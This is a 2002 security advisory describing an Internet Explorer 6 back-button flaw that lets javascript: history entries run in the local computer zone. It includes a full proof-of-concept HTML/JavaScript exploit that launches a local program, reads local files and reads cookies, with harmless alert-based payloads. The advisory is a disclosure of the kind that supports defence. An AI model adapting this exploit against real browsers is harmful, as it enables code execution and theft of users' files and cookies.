SecurityvulnsSECURITYVULNS:DOC:2768Using the backbutton in IE is dangerous
—…—…—…—…—…—…—…—…—…—…—…—…----
Title: Using the backbutton in IE is dangerous.
Date: [2002-04-15]
Software: At least Internet Explorer 6.0.
Tested env: Windows 2000 pro, XP.
Rating: Medium because user interaction is needed.
Impact: Read cookies/local files and execute code
(triggered when user hits the back button).
Patch: None.
Vendor: Microsoft contacted 12 Nov 2001, additional
information given 25 Mar 2002.
Workaround: Disable active scripting or never _ _
use the back button. o' \,=./ `o
Author: Andreas Sandblad, [email protected] (o o)
—=–=—=–=–=—=–=–=–=–=—=–=–=-----ooO–(_)–Ooo—
DESCRIPTION:
IE allows urls containing the javascript protocoll in the history list.
Code injected in the url will operate in the same zone/domain as the last
url viewed. The javascript url can be set to trigger when a user presses
the backbutton.
The normal behaviour when a page fails to load is to press the backbutton.
The error page shown by IE is operating in the local computer zone
(res://C:\WINNT\System32\shdoclc.dll/dnserror.htm# on Win2000). Thus, we
can execute code and read local files.
EXPLOIT:
The exploit works as follow: Press one of the links and then the back
button.
Note: Exploit has only been tested on fully patched IE 6.0, with Win XP
and Win2000 pro (assume other OS are also vulnerable). Winmine.exe and
test.txt must exist.
--------------------------CUT HERE-------------------------------
<html>
<h1>Press link and then the backbutton to trigger script.</h1>
<a href="javascript:execFile('file:///c:/winnt/system32/winmine.exe')">
Run Minesweeper (c:/winnt/system32/winmine.exe Win2000 pro)</a><br>
<a href="javascript:execFile('file:///c:/windows/system32/winmine.exe')">
Run Minesweeper (c:/windows/system32/winmine.exe XP, ME etc…)</a><br>
<a href="javascript:readFile('file:///c:/test.txt')">
Read c:\test.txt (needs to be created)</a><br>
<a href="javascript:readCookie('http://www.google.com/')">
Read Google cookie</a>
<script>
// badUrl = "http://www.nonexistingdomain.se"; // Use if not XP
badUrl = "res:";
function execFile(file){
s = '<object classid=CLSID:11111111-1111-1111-1111-111111111111 ';
s+= 'CODEBASE='+file+'></OBJECT>';
backBug(badUrl,s);
}
function readFile(file){
s = '<iframe name=i src='+file+' style=display:none onload=';
s+= 'alert(i.document.body.innerText)></iframe>';
backBug(badUrl,s);
}
function readCookie(url){
s = '<script>alert(document.cookie);close();<"+"/script>';
backBug(url,s);
}
function backBug(url,payload){
len = history.length;
page = document.location;
s = "javascript:if (history.length!="+len+") {";
s+= "open('javascript:document.write(\""+payload+"\")')";
s+= ";history.back();} else '<script>location=\""+url
s+= "\";document.title=\""+page+"\";<"+"/script>';";
location = s;
}
</script>
</html>
--------------------------CUT HERE-------------------------------
Disclaimer:
Andreas Sandblad is not responsible for the misuse of the
information provided in this advisory. The opinions expressed
are my own and not of any company. In no event shall the author
be liable for any damages whatsoever arising out of or in
connection with the use or spread of this advisory. Any use of
the information is at the user's own risk.
Feedback:
Please send suggestions and comments to: _ _
[email protected] o' \,=./ `o
(o o)
—=–=—=–=–=—=–=–=–=–=—=–=–=-----ooO–(_)–Ooo—
Andreas Sandblad,
student in Engineering Physics at the University of Umea, Sweden.
-/—/—/—/—/—/—/—/—/—/—/—/—/—/—/—/–